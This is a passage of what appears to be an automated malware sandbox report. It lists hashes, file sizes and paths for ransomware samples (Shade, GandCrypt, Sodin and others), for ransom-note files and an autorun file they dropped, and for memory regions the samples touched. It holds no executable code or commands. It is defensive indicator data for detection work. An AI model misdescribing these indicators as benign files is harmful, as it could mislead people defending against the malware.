                                                                                                                                                                                                                                                                                                                                                                                                1b30cd599bf670b866446a91ab5257b8b094492c

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                cedf567ebc23b6090de2703911003e3bdbf2c13cc61b700240536715935e835c

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                dcd674c1cc2f1aac010ae0fbe274a2e15ba07e70536421c77be18d7c3649e2b44fe2d3e2c0a9c70547c6e51e41cca6cb1e5a978055ececd547926daa6c33560c

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.PolyRansom.gen-8298be3054f9f33b629b53757659873ad12b81b3f7038e0cd39fa0131f1553a3.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                624KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                2c985167149b7ef64306f58a41a9890e

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                c00ef9139509079ec2bd0e009639df7a0507ddb7

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                8298be3054f9f33b629b53757659873ad12b81b3f7038e0cd39fa0131f1553a3

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                a9a927ec137ddcca84ca2ad6f628844981f78dbc156e2a521b4a16790ae5894389ec5105c0612faa23aef549b825da81beca5ef57aea6c1ca49ff9de9e94ef90

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\HEUR-Trojan-Ransom.Win32.Shade.vho-115591f33f7d53985f4d8f7a519906336c386eda4fae0486904e79e925550b66.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                336KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                8e812e94145f3df7005e7f60b6e41739

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                a4939f576b97eac4b08d3cd08ea01fb0b9e77715

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                115591f33f7d53985f4d8f7a519906336c386eda4fae0486904e79e925550b66

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                9bfa12259a576346aa518d0586d59a1833b21ab24341bcbe4f6aeade89120dc6b633fd536ddd65ec9c3e130bfa35c5b7c8811ac37e4de7d03891746e4cbc92c7

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Crusis.dsu-af2c1d4af00e47af98e83cba1e368428c6d64c5048a2f2d7bd0ea836de0df7b3.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                466KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                b1944fb79d4b12d77d3b57d093b858a5

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                64dd49b8dbb6c35e041122fc56a4981d601662eb

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                af2c1d4af00e47af98e83cba1e368428c6d64c5048a2f2d7bd0ea836de0df7b3

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                5e72a95b5a64e774f4c0446a13438e1552c508312def4047e3bc342c1dc0cbbea562e890d5bd0403bd6f97c3e840fac5564197334077a60d4a0c9d812594eb73

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Foreign.ojib-e8019df6572b12d099ac33d3c02e7cbd02971e55700430f5bbcd7855c4ff6ce0.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                655KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                094f1a36cf540ff71b37e31602565b4b

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                6654b0e101adb769565cf1032432ab5007fb8aad

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                e8019df6572b12d099ac33d3c02e7cbd02971e55700430f5bbcd7855c4ff6ce0

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                7127f26d41e50efb7b3730026af3251908dea8085bea7e38bc9684e0547d37b5ccffcd3cab98b9759345a99abddff9533a9a852dd141dad6790a7367054eb92f

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.GandCrypt.jes-f4f1362dd693cfe868bda49cab9be4c80a5c625df9a7f4a8e64368d925d77d46.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                73KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                0eed6d14d896d380e4f7ce2964b17bf7

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                e232abb4a5e3ab6d1c787519fbdffd3c8ade4c94

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                f4f1362dd693cfe868bda49cab9be4c80a5c625df9a7f4a8e64368d925d77d46

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                185343bc631475657a259c9ae46f964b7db27730dae734ea1e767bab86bb5dfce4e28ef94c26a6a6a1fcde1600dc266d73d734909fbe8c858dcc5fc913fbcc20

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Rack.iqi-d42b70f5dafd78c0ba9ca1ede4e5d8add0a5046640cb165bf907f5bd66f246ed.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                270KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                0cf2d23d4d0baaa336a27e04f15f76ee

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                31fdcca79679987bb7c42ecebfbf1639e62d80bb

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                d42b70f5dafd78c0ba9ca1ede4e5d8add0a5046640cb165bf907f5bd66f246ed

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                c6a97259284c3e3d8cdb00df10702183099b23e18dd55748f17bf5872a785ffc7f5c17648e9e0467f4bfe6474cced2312e61900ce1eac18cb478b23c5b4ca576

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Shade.pbq-0813dd814b07bb9acf1114bd8a5f4b4b624c667464bac48d91ebd9f9c8e640c7.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.3MB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                42f863b666068491f41cfcacc57eb711

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                073acb2735748c3f14dbfb0b48d5dab8c504094c

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                0813dd814b07bb9acf1114bd8a5f4b4b624c667464bac48d91ebd9f9c8e640c7

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                acbe1a66b86944dc0c5e4b4f8b54cb392d6e708c04e84e9ef61ffbc85fa70405281f0346d07c164c903aaa394154c0f18578df34bed206b572438f5b307cedd9

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Shade.pyr-03246cda354d8efbc9e22057cc283609825f15cf33ddc5296deac54c2b540218.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.1MB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                32126de1466136e0b4f39560f3956fb9

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                1f2b679904a40552d24d430529e70c916504aef4

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                03246cda354d8efbc9e22057cc283609825f15cf33ddc5296deac54c2b540218

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                50b49d35e8953584e1dc3a9263093ef1be4f75ac6daec1eb18d649ff9228d819166aa0949f9f0f336354ce10ad7f5a71295b1704b86f311c0e3afebbbc9905ec

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Shade.qjq-7ce52df2e1186532c119b3ad42fad1012bb78e6393bff209086dec386bbd49af.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.4MB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                0eef75deaea6806d3dde5b83c3b625f6

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                dcaedcc047db68c979263293a0a767e52bc88d15

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                7ce52df2e1186532c119b3ad42fad1012bb78e6393bff209086dec386bbd49af

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                2e5a2bbc751c3349a393484215f5792d284727e8338414e55c4a13fa7f52dc93b0eb4c75efce79cbd138bcf44d4c2a279a68c7bf51bf9afc0b5d0b5f5a03ec6b

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Sodin.aay-d63d1c46b1e83d54ad1d37bd0c8b62447060af35f53296c3059d75dc4d3fa15c.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                164KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                1f0e494c8ed568615a04c265879ccd8e

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                508eb9d543c3dd502989107029050ace012a59b9

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                d63d1c46b1e83d54ad1d37bd0c8b62447060af35f53296c3059d75dc4d3fa15c

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                696f44f8c31c0a4e6e1b4b7b22b95e51eca607731847d90cc258ed1d9502e8d3b94757d5f45df1759f02439694df9bb5c9c7f7de532afce2faca01ca18d1938e

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Sodin.aw-6eb992c4c8453e929ebc737780067f78e50a18934358e44db6d95fca3106e8e2.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                179KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                ef1ca1995495a6fad440bbc08ff3f119

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                7ba2c18108be1d12a29f090cc1f96f41908ecf6d

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                6eb992c4c8453e929ebc737780067f78e50a18934358e44db6d95fca3106e8e2

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                558a13b2ef020c246bd840816c983fc8f2e67fb1f59dba1dbb12689a8cba7cb217b190ebedb27dad01b209a6a99fb57df1799f894ecd6f35860e5764fc2f936a

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Desktop\00374\Trojan-Ransom.Win32.Sodin.bb-f4e5d7a95681d920dda75fe5dd89be249905e2a7712f9b3b39e19351f5ef5e69.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                179KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                d0190f94e6d05104977c53b55dbc2911

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                c0ff002b0e26b180a741c3cefff15190df7746cc

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                f4e5d7a95681d920dda75fe5dd89be249905e2a7712f9b3b39e19351f5ef5e69

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                d4b1cc032f9d8254ac6035c27948147d8c4c5f60be51e632ba26c6e34ada87515b3113b4bd1cec3cedfa1a73c465a1267681ca05356d8f2f08d81c4fef04d868

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\Pictures\Saved Pictures\m5r5p-wannadie.txt.popcorn

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                6KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                e2884f40dc1e551f62b80c9a54bc5374

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                2cd7086d0f7f45b0de177db77181986ec6e52118

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                ef5847f06699a4afbfaa2b93269088aa7a6130632e1b924f299d35b041668b0c

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                a41fd12f5bdf9fd988f126ca02ff44466ad534a804a1a6e5b8e55385a4072c3512482dfede0cb679c042bef49362bb09471d4ca1f2af2ab2e6efee89c98e6f8c

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\m5r5p-wannadie.txt

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                6KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                2da342b7c5a1fa4c6b2eadb10f22754f

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                a60e79cc2965a975dab373b6fa29dba778271a4b

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                e4a63526679ed1ad318fe6f103dcc03a80f66bae3a600c621236e3d4ff6653d3

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                147aa56f644edec307241c8c8774180ea0f8ed7b89e782e96aee64fd32dc332d8ef54c2233a298c73018e87bbf74f7467572f558fd914967569d71f13509837a

                                                                                                                                                                                                                                                                                                                                                                                              • C:\Windows\Installer\MSI78D4.tmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                181KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                0c80a997d37d930e7317d6dac8bb7ae1

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                018f13dfa43e103801a69a20b1fab0d609ace8a5

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                a5dd2f97c6787c335b7807ff9b6966877e9dd811f9e26326837a7d2bd224de86

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                fe1caef6d727344c60df52380a6e4ab90ae1a8eb5f96d6054eced1b7734357ce080d944fa518cf1366e14c4c0bd9a41db679738a860800430034a75bb90e51a5

                                                                                                                                                                                                                                                                                                                                                                                              • F:\AUTORUN.INF

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                145B

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                ca13857b2fd3895a39f09d9dde3cca97

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                8b78c5b2ec97c372ebdcef92d14b0998f8dd6dd0

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                cfe448b4506a95b33b529efa88f1ac704d8bdf98a941c065650ead27609318ae

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                55e5b5325968d1e5314527fb2d26012f5aae4a1c38e305417be273400cb1c6d0c22b85bddb501d7a5720a3f53bb5caf6ada8a7894232344c4f6c6ef85d226b47

                                                                                                                                                                                                                                                                                                                                                                                              • \??\c:\users\admin\desktop\00374\trojan-ransom.win32.snocry.cvy-c5e5fd674ac39c58533687c8d8ed51c465459b5b8e0f52e8a1b0f692c500e3b0.exe

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                550KB

                                                                                                                                                                                                                                                                                                                                                                                                MD5

                                                                                                                                                                                                                                                                                                                                                                                                a6fd5f1f7ec2e5f212f10de9d4b50b11

                                                                                                                                                                                                                                                                                                                                                                                                SHA1

                                                                                                                                                                                                                                                                                                                                                                                                832c6567df0b4f84644c75b87f5d4cbc9bd12a21

                                                                                                                                                                                                                                                                                                                                                                                                SHA256

                                                                                                                                                                                                                                                                                                                                                                                                c5e5fd674ac39c58533687c8d8ed51c465459b5b8e0f52e8a1b0f692c500e3b0

                                                                                                                                                                                                                                                                                                                                                                                                SHA512

                                                                                                                                                                                                                                                                                                                                                                                                f988994ab2ead01aa250526725d75c6bd4be8be4d1e011a8ff28a813ad47210727f33b58c4bd0e15967b8c0dd3ed48114f5e86c71ade9a057c548acf1c08bbac

                                                                                                                                                                                                                                                                                                                                                                                              • memory/336-5927-0x0000000000400000-0x0000000000478000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                480KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/336-393-0x0000000000400000-0x0000000000478000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                480KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/336-2646-0x0000000000400000-0x0000000000478000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                480KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/632-396-0x0000000000400000-0x0000000001400000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                16.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/872-378-0x0000000000400000-0x0000000000506000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/872-384-0x0000000000400000-0x0000000000506000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/872-179-0x0000000000400000-0x0000000000506000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/1516-88-0x000001EE5A9B0000-0x000001EE5AA26000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                472KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/1516-87-0x000001EE5A800000-0x000001EE5A844000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                272KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/1516-90-0x000001EE5A890000-0x000001EE5A8AE000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                120KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/1516-86-0x000001EE5A440000-0x000001EE5A462000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                136KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/1532-2367-0x0000000000400000-0x0000000000419000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                100KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/1684-316-0x0000000000EB0000-0x0000000000FF0000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.2MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/1684-5008-0x0000000000EB0000-0x0000000000FF0000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.2MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/1684-20364-0x0000000000EB0000-0x0000000000FF0000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.2MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/1684-5322-0x0000000000EB0000-0x0000000000FF0000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.2MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/1684-2351-0x0000000000EB0000-0x0000000000FF0000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.2MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/1996-380-0x0000000000400000-0x0000000000414000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                80KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2084-241-0x0000000000400000-0x0000000000607000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2084-6106-0x0000000000400000-0x0000000000607000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2084-213-0x0000000000400000-0x0000000000607000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2084-603-0x0000000000400000-0x0000000000607000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2084-247-0x0000000000400000-0x0000000000607000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2084-246-0x0000000000400000-0x0000000000607000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2084-240-0x0000000000400000-0x0000000000607000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2084-239-0x0000000000400000-0x0000000000607000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2084-2653-0x0000000000400000-0x0000000000607000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                2.0MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2132-2645-0x0000000063140000-0x000000006314B000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                44KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2132-5816-0x0000000000400000-0x0000000000469000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                420KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2132-2644-0x0000000064540000-0x000000006454A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                40KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2132-347-0x0000000063140000-0x000000006314B000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                44KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2132-346-0x0000000064540000-0x000000006454A000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                40KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2132-345-0x0000000000400000-0x0000000000469000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                420KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2132-5732-0x0000000000400000-0x0000000000469000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                420KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2132-2641-0x0000000000400000-0x0000000000469000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                420KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2256-605-0x0000000000EB0000-0x0000000000FF0000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.2MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2256-194-0x0000000000EB0000-0x0000000000FF0000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.2MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2256-21029-0x0000000000EB0000-0x0000000000FF0000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                1.2MB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2344-310-0x0000000003570000-0x0000000003576000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                24KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2344-308-0x0000000003410000-0x0000000003446000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                216KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2476-133-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                72KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2476-134-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                72KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2476-131-0x0000000000400000-0x0000000000412000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                72KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2640-56-0x0000014DA5870000-0x0000014DA5871000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2640-55-0x0000014DA5870000-0x0000014DA5871000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2640-48-0x0000014DA5870000-0x0000014DA5871000-memory.dmp

                                                                                                                                                                                                                                                                                                                                                                                                Filesize

                                                                                                                                                                                                                                                                                                                                                                                                4KB

                                                                                                                                                                                                                                                                                                                                                                                              • memory/2640-49-0x0000014DA5870000-0x0000014DA5871000-memory.dmp

